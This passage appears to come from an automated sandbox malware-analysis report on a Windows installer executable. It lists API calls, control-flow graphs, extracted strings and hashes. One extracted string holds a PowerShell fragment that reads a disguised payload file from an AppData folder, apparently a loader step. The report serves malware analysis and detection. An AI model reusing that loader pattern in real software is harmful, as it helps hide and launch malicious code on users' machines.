                                                        • GetDlgItem.USER32(?,00000403), ref: 00405198
                                                        • GetDlgItem.USER32(?,000003EE), ref: 004051A7
                                                        • GetClientRect.USER32(?,?), ref: 004051E4
                                                        • GetSystemMetrics.USER32(00000015), ref: 004051EC
                                                        • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 0040520D
                                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040521E
                                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405231
                                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040523F
                                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405252
                                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405274
                                                        • ShowWindow.USER32(?,00000008), ref: 00405288
                                                        • GetDlgItem.USER32(?,000003EC), ref: 004052A9
                                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004052B9
                                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052D2
                                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052DE
                                                        • GetDlgItem.USER32(?,000003F8), ref: 004051B6
                                                          • Part of subcall function 00403FCA: SendMessageW.USER32(00000028,?,00000001,00403DF6), ref: 00403FD8
                                                        • GetDlgItem.USER32(?,000003EC), ref: 004052FB
                                                        • CreateThread.KERNELBASE(00000000,00000000,Function_000050CD,00000000), ref: 00405309
                                                        • CloseHandle.KERNELBASE(00000000), ref: 00405310
                                                        • ShowWindow.USER32(00000000), ref: 00405334
                                                        • ShowWindow.USER32(?,00000008), ref: 00405339
                                                        • ShowWindow.USER32(00000008), ref: 00405380
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B2
                                                        • CreatePopupMenu.USER32 ref: 004053C3
                                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053D8
                                                        • GetWindowRect.USER32(?,?), ref: 004053EB
                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040540F
                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040544A
                                                        • OpenClipboard.USER32(00000000), ref: 0040545A
                                                        • EmptyClipboard.USER32 ref: 00405460
                                                        • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040546C
                                                        • GlobalLock.KERNEL32(00000000), ref: 00405476
                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040548A
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 004054AA
                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 004054B5
                                                        • CloseClipboard.USER32 ref: 004054BB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                        • String ID: {
                                                        • API String ID: 590372296-366298937
                                                        • Opcode ID: 6a257b260a3b0c83269dcddb951c3defeee43ec038cce651daa15833628ad7d2
                                                        • Instruction ID: 772e8fb2bc22c5523386e43e2fe12f7b772d85fac993704a731418f1505fe185
                                                        • Opcode Fuzzy Hash: 6a257b260a3b0c83269dcddb951c3defeee43ec038cce651daa15833628ad7d2
                                                        • Instruction Fuzzy Hash: A8A14871800609FFDB119F60DD89AAE7B79FF08355F00403AFA45BA1A0CBB59A51DF58
                                                        Function 00405D68 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 207stringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 409 405d68-405d73 410 405d75-405d84 409->410 411 405d86-405d9c 409->411 410->411 412 405da2-405daf 411->412 413 405fb4-405fba 411->413 412->413 414 405db5-405dbc 412->414 415 405fc0-405fcb 413->415 416 405dc1-405dce 413->416 414->413 418 405fd6-405fd7 415->418 419 405fcd-405fd1 call 405d46 415->419 416->415 417 405dd4-405de0 416->417 421 405fa1 417->421 422 405de6-405e22 417->422 419->418 423 405fa3-405fad 421->423 424 405faf-405fb2 421->424 425 405f42-405f46 422->425 426 405e28-405e33 GetVersion 422->426 423->413 424->413 429 405f48-405f4c 425->429 430 405f7b-405f7f 425->430 427 405e35-405e39 426->427 428 405e4d 426->428 427->428 434 405e3b-405e3f 427->434 431 405e54-405e5b 428->431 435 405f5c-405f69 call 405d46 429->435 436 405f4e-405f5a call 405c8d 429->436 432 405f81-405f89 call 405d68 430->432 433 405f8e-405f9f lstrlenW 430->433 438 405e60-405e62 431->438 439 405e5d-405e5f 431->439 432->433 433->413 434->428 442 405e41-405e45 434->442 446 405f6e-405f77 435->446 436->446 444 405e64-405e81 call 405c13 438->444 445 405e9e-405ea1 438->445 439->438 442->428 447 405e47-405e4b 442->447 452 405e86-405e8a 444->452 450 405eb1-405eb4 445->450 451 405ea3-405eaf GetSystemDirectoryW 445->451 446->433 449 405f79 446->449 447->431 453 405f3a-405f40 call 405fda 449->453 455 405eb6-405ec4 GetWindowsDirectoryW 450->455 456 405f1f-405f21 450->456 454 405f23-405f27 451->454 457 405e90-405e99 call 405d68 452->457 458 405f29-405f2d 452->458 453->433 454->453 454->458 455->456 456->454 459 405ec6-405ed0 456->459 457->454 458->453 462 405f2f-405f35 lstrcatW 458->462 464 405ed2-405ed5 459->464 465 405eea-405f00 SHGetSpecialFolderLocation 459->465 462->453 464->465 466 405ed7-405ede 464->466 467 405f02-405f19 SHGetPathFromIDListW CoTaskMemFree 465->467 468 405f1b 465->468 470 405ee6-405ee8 466->470 467->454 467->468 468->456 470->454 470->465
                                                        APIs
                                                        • GetVersion.KERNEL32(00000000,Frisurens,?,00405031,Frisurens,00000000,00000000,0041C0DD), ref: 00405E2B
                                                        • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 00405EA9
                                                        • GetWindowsDirectoryW.KERNEL32(: Completed,00000400), ref: 00405EBC
                                                        • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00405EF8
                                                        • SHGetPathFromIDListW.SHELL32(?,: Completed), ref: 00405F06
                                                        • CoTaskMemFree.OLE32(?), ref: 00405F11
                                                        • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00405F35
                                                        • lstrlenW.KERNEL32(: Completed,00000000,Frisurens,?,00405031,Frisurens,00000000,00000000,0041C0DD), ref: 00405F8F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                        • String ID: "$Aichmophobia=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Karbonpapirs.Fis';$Referendumets=$Aichmo$: Completed$Frisurens$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                        • API String ID: 900638850-715576875
                                                        • Opcode ID: 22fe4a5b293e7964b16035e555f953c0a2e3a01ea996a2207c843cdd348733b1
                                                        • Instruction ID: b81ff5d6b4e7f68ebbf9f5a60334f295c7cfdbca171d810927ba552bda20cf23
                                                        • Opcode Fuzzy Hash: 22fe4a5b293e7964b16035e555f953c0a2e3a01ea996a2207c843cdd348733b1
                                                        • Instruction Fuzzy Hash: E761C071A00906ABDF209F25CD45AAF37A5EF55314F14803BE585BA2E0D77D8A82CF8D
                                                        Function 004055D5 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159filestringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 471 4055d5-4055fb call 4058b6 474 405614-40561b 471->474 475 4055fd-40560f DeleteFileW 471->475 477 40561d-40561f 474->477 478 40562e-40563e call 405d46 474->478 476 4057a7-4057ab 475->476 479 405755-40575a 477->479 480 405625-405628 477->480 486 405640-40564b lstrcatW 478->486 487 40564d-40564e call 4057fa 478->487 479->476 482 40575c-40575f 479->482 480->478 480->479 484 405761-405767 482->484 485 405769-405771 call 406089 482->485 484->476 485->476 494 405773-405787 call 4057ae call 40558d 485->494 489 405653-405657 486->489 487->489 492 405663-405669 lstrcatW 489->492 493 405659-405661 489->493 495 40566e-40568b lstrlenW FindFirstFileW 492->495 493->492 493->495 510 405789-40578c 494->510 511 40579f-4057a2 call 404ffa 494->511 496 405691-4056aa call 4057db 495->496 497 40574a-40574e 495->497 504 4056b5-4056b9 496->504 505 4056ac-4056b0 496->505 497->479 501 405750 497->501 501->479 508 4056d0-4056de call 405d46 504->508 509 4056bb-4056c2 504->509 505->504 507 4056b2 505->507 507->504 521 4056e0-4056e8 508->521 522 4056f5-405700 call 40558d 508->522 513 4056c4-4056c8 509->513 514 405729-40573b FindNextFileW 509->514 510->484 516 40578e-40579d call 404ffa call 405be0 510->516 511->476 513->508 517 4056ca-4056ce 513->517 514->496 519 405741-405744 FindClose 514->519 516->476 517->508 517->514 519->497 521->514 525 4056ea-4056f3 call 4055d5 521->525 530 405721-405724 call 404ffa 522->530 531 405702-405705 522->531 525->514 530->514 533 405707-405717 call 404ffa call 405be0 531->533 534 405719-40571f 531->534 533->514 534->514
                                                        APIs
                                                        • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,75923420,"C:\Users\user\Desktop\ro7eoySJ9q.exe"), ref: 004055FE
                                                        • lstrcatW.KERNEL32(0042F200,\*.*,0042F200,?,?,C:\Users\user\AppData\Local\Temp\,75923420,"C:\Users\user\Desktop\ro7eoySJ9q.exe"), ref: 00405646
                                                        • lstrcatW.KERNEL32(?,0040A014,?,0042F200,?,?,C:\Users\user\AppData\Local\Temp\,75923420,"C:\Users\user\Desktop\ro7eoySJ9q.exe"), ref: 00405669
                                                        • lstrlenW.KERNEL32(?,?,0040A014,?,0042F200,?,?,C:\Users\user\AppData\Local\Temp\,75923420,"C:\Users\user\Desktop\ro7eoySJ9q.exe"), ref: 0040566F
                                                        • FindFirstFileW.KERNEL32(0042F200,?,?,?,0040A014,?,0042F200,?,?,C:\Users\user\AppData\Local\Temp\,75923420,"C:\Users\user\Desktop\ro7eoySJ9q.exe"), ref: 0040567F
                                                        • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,?,?,0000003F), ref: 00405733
                                                        • FindClose.KERNEL32(00000000), ref: 00405744
                                                        Strings
                                                        • "C:\Users\user\Desktop\ro7eoySJ9q.exe", xrefs: 004055DE
                                                        • \*.*, xrefs: 00405640
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004055E3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                        • String ID: "C:\Users\user\Desktop\ro7eoySJ9q.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                        • API String ID: 2035342205-1841810270
                                                        • Opcode ID: 47c12af7b891abb2e5cafb38bce86d44a40b8918cc5e8908534289e066a9b85e
                                                        • Instruction ID: 4fa580f458b6ccb0767a7c3d42ea348ba32fb6fd56c90456328cf5468defc57c
                                                        • Opcode Fuzzy Hash: 47c12af7b891abb2e5cafb38bce86d44a40b8918cc5e8908534289e066a9b85e
                                                        • Instruction Fuzzy Hash: 8A51B135800A05EACB21AB218C85ABF7778EF81754F54843BF415B61D1E77C4982EE6D
                                                        Function 004060B0 Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleA.KERNEL32(?,?,00000020,00403220,00000008), ref: 004060C2
                                                        • LoadLibraryA.KERNELBASE(?,?,00000020,00403220,00000008), ref: 004060CD
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 004060DE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: AddressHandleLibraryLoadModuleProc
                                                        • String ID:
                                                        • API String ID: 310444273-0
                                                        • Opcode ID: 5679b5def2f7da251302a8cf4847d9d0b7faea0d144796f5e929e2ea3512b209
                                                        • Instruction ID: 8a2f4544d0f7460eb2636e635d5deeba11c8ac6a6071c480d08d1599e38ef1a2
                                                        • Opcode Fuzzy Hash: 5679b5def2f7da251302a8cf4847d9d0b7faea0d144796f5e929e2ea3512b209
                                                        • Instruction Fuzzy Hash: C3E0CD326002309BC3204B30AE4497773EC9F98640305043EF645F6000CB74DC22EF69
                                                        Function 00406089 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileW.KERNELBASE(?,00430248,0042FA00,004058FF,0042FA00,0042FA00,00000000,0042FA00,0042FA00,?,?,75923420,004055F5,?,C:\Users\user\AppData\Local\Temp\,75923420), ref: 00406094
                                                        • FindClose.KERNELBASE(00000000), ref: 004060A0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: Find$CloseFileFirst
                                                        • String ID:
                                                        • API String ID: 2295610775-0
                                                        • Opcode ID: 9c2bed4397a3bf892ba140cd3fe5090782190f2fd0e109c23d43d293603923f5
                                                        • Instruction ID: 8c9aebf9a212da5294cb1f82767a4f5960c49382cb163a998aea3b369420c93e
                                                        • Opcode Fuzzy Hash: 9c2bed4397a3bf892ba140cd3fe5090782190f2fd0e109c23d43d293603923f5
                                                        • Instruction Fuzzy Hash: B2D012716585209BC7905738AE0C84B7A98AF593717224B36F46BF22E0CB3C8C66869C
                                                        Function 0040371A Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 216stringregistrylibraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 168 40371a-403732 call 4060b0 171 403734-403744 call 405c8d 168->171 172 403746-40377d call 405c13 168->172 179 4037a0-4037c9 call 4039f0 call 4058b6 171->179 177 403795-40379b lstrcatW 172->177 178 40377f-403790 call 405c13 172->178 177->179 178->177 186 40385b-403863 call 4058b6 179->186 187 4037cf-4037d4 179->187 193 403871-403896 LoadImageW 186->193 194 403865-40386c call 405d68 186->194 187->186 188 4037da-403802 call 405c13 187->188 188->186 195 403804-403808 188->195 197 403917-40391f call 40140b 193->197 198 403898-4038c8 RegisterClassW 193->198 194->193 200 40381a-403826 lstrlenW 195->200 201 40380a-403817 call 4057db 195->201 210 403921-403924 197->210 211 403929-403934 call 4039f0 197->211 202 4039e6 198->202 203 4038ce-403912 SystemParametersInfoW CreateWindowExW 198->203 207 403828-403836 lstrcmpiW 200->207 208 40384e-403856 call 4057ae call 405d46 200->208 201->200 205 4039e8-4039ef 202->205 203->197 207->208 209 403838-403842 GetFileAttributesW 207->209 208->186 214 403844-403846 209->214 215 403848-403849 call 4057fa 209->215 210->205 221 40393a-403957 ShowWindow LoadLibraryW 211->221 222 4039bd-4039be call 4050cd 211->222 214->208 214->215 215->208 224 403960-403972 GetClassInfoW 221->224 225 403959-40395e LoadLibraryW 221->225 226 4039c3-4039c5 222->226 227 403974-403984 GetClassInfoW RegisterClassW 224->227 228 40398a-4039ad DialogBoxParamW call 40140b 224->228 225->224 229 4039c7-4039cd 226->229 230 4039df-4039e1 call 40140b 226->230 227->228 234 4039b2-4039bb call 40366a 228->234 229->210 232 4039d3-4039da call 40140b 229->232 230->202 232->210 234->205
                                                        APIs
                                                          • Part of subcall function 004060B0: GetModuleHandleA.KERNEL32(?,?,00000020,00403220,00000008), ref: 004060C2
                                                          • Part of subcall function 004060B0: LoadLibraryA.KERNELBASE(?,?,00000020,00403220,00000008), ref: 004060CD
                                                          • Part of subcall function 004060B0: GetProcAddress.KERNEL32(00000000,?), ref: 004060DE
                                                        • lstrcatW.KERNEL32(1033,0042D1F8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D1F8,00000000,00000006,C:\Users\user\AppData\Local\Temp\,75923420,00000000,"C:\Users\user\Desktop\ro7eoySJ9q.exe"), ref: 0040379B
                                                        • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\Polysulfonate\sangersken,1033,0042D1F8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D1F8,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 0040381B
                                                        • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\Polysulfonate\sangersken,1033,0042D1F8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D1F8,00000000), ref: 0040382E
                                                        • GetFileAttributesW.KERNEL32(: Completed), ref: 00403839
                                                        • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Polysulfonate\sangersken), ref: 00403882
                                                          • Part of subcall function 00405C8D: wsprintfW.USER32 ref: 00405C9A
                                                        • RegisterClassW.USER32(00433E40), ref: 004038BF
                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004038D7
                                                        • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 0040390C
                                                        • ShowWindow.USER32(00000005,00000000), ref: 00403942
                                                        • LoadLibraryW.KERNELBASE(RichEd20), ref: 00403953
                                                        • LoadLibraryW.KERNEL32(RichEd32), ref: 0040395E
                                                        • GetClassInfoW.USER32(00000000,RichEdit20A,00433E40), ref: 0040396E
                                                        • GetClassInfoW.USER32(00000000,RichEdit,00433E40), ref: 0040397B
                                                        • RegisterClassW.USER32(00433E40), ref: 00403984
                                                        • DialogBoxParamW.USER32(?,00000000,00403ABD,00000000), ref: 004039A3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                        • String ID: "C:\Users\user\Desktop\ro7eoySJ9q.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$@>C$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Polysulfonate\sangersken$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                        • API String ID: 914957316-2942254395
                                                        • Opcode ID: 0aa4beac196019a4959303d62d6cbf1607d52bd303ace0c241830d38af164bbc
                                                        • Instruction ID: f2efbd8b4e2183f22d1c30e2af872408ecd3ec1be094dd46b245239935a3b56e
                                                        • Opcode Fuzzy Hash: 0aa4beac196019a4959303d62d6cbf1607d52bd303ace0c241830d38af164bbc
